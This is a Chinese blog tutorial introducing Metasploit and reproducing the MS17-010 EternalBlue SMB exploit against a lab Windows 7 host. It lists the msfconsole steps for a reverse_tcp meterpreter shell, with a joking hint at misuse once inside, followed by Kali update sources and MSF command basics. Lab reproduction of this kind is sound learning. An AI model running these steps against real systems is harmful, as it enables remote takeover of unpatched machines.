美文网首页
Nine Msf介绍及MS17-010(永恒之蓝)复现

Nine Msf介绍及MS17-010(永恒之蓝)复现

作者: _Beginner | 来源:发表于2020-03-09 14:48 被阅读0次

一.介绍和准备

1、本文介绍Msf及MS17-010(永恒之蓝)复现

2、环境:kali(IP:192.168.1.184)、win7(IP:192.168.1.98)

3、使用的工具:metasploit、天境

4、准备:将kali更新到最新版本:终端打开后输入“ apt-get update && apt-get upgrade ” 完成后再输入“ apt-get dist-upgrade ”等待完成即可。


二.MSF介绍/MS17-010(永恒之蓝)复现

1、介绍:1)Metasploit:是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。详细介绍点我

                 2)MS17-010(永恒之蓝)漏洞原理是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码

                注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让资源可互通。

2、使用天境对对win7进行扫描过后,发现MS17-010(永恒之蓝):

3、于是,打开kali进入msfconsole,seach ms17-010:

      1)若出现:WARNING: No database support: No database YAML file;  终端输入“ msfdb init ” 即可。

      2)若出现:cannot load such file -- bundler/setup;终端输入sudo gem install bundler、bundle update celluloid即可。

      3)由于我的肉鸡是win7,所以吧use 2(use exploit/windows/smb/ms17_010_eternalblue);然后info看看:

        4)设置一下目标/肉鸡、地址/IP(set 192.168.1.98)和Paylod(set payload windows/x64/meterpreter/reverse_tcp),然后show options,还需要设置一下控制端:

          5)set lhost 192.168.1.184(kali的IP地址),设置好后exploit/run一下,然后用shell就进入win7:

          6)既然都进到win7了,能干什么你们懂吧??哈哈哈。。。。。。。。


三.MSF常识

1、更新源:1)vi /etc/apt/sources.list

                  2)# kali官方源

                    deb http://http.kali.org/ kali-rolling main non-free contrib

                    deb-src http://http.kali.org/ kali-rolling main non-free contrib

                    #中科大源

                    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib                   

                    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

                 3)若更新出现错误,添加一下签名:

                    wget archive.kali.org/archive-key.asc   //下载签名

                    apt-key add archive-key.asc   //安装签名

2、MSF Kali下存放目录:/usr/share/MSF-framework/

3、1)Modules:用户用到的各种模块几乎都在这里。

      2)Auxiliary:主要包含渗透测试中一些辅助性的脚本。

      3)Encoders:各种编码工具 用于躲过入侵检测和过滤系统。

      4)Exploits:主要包含了传说中的exp、0day、各种漏洞利用的脚本。

      5)Nops: NOP (No Operation or Next Operation) sled,由于IDS/IPS检查数据包中不规则的数据。

      6)Payloads :是攻击者发送给系统执行的指令(目标机执行);exploits是本地机执行作用于目标机;命名规则是:系统/类型/名称。

      7)Post: 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。

      8)Data:放工具和一些用户接口代码

      9)Plugins:各种要用到的插件。

      10)Scripts:这个目录下的文件大都是Meterpreter利用的脚本。

      11)Tools:包含一些有用的脚本和零散的工具。

4、 1)search 搜索模块名和描述。

       2)use:进入。

       3)back :返回。

       4)Banner命令,显示一个MSF的banner。

       5)info 显示信息。

       6)irb进入irb脚本模式。

      7)jobs显示和管理作业

      8)sleep:在限定的秒数内什么也不做。

      9)unset/unsetg:解出一个或多个变量。

      10)unload:卸载一个模块。

      11) resource:运行储存一个文件中的命令。

      12)route:查看一个会话的路由信息。

相关文章

网友评论

      本文标题:Nine Msf介绍及MS17-010(永恒之蓝)复现

      本文链接:https://www.haomeiwen.com/subject/vxkpdhtx.html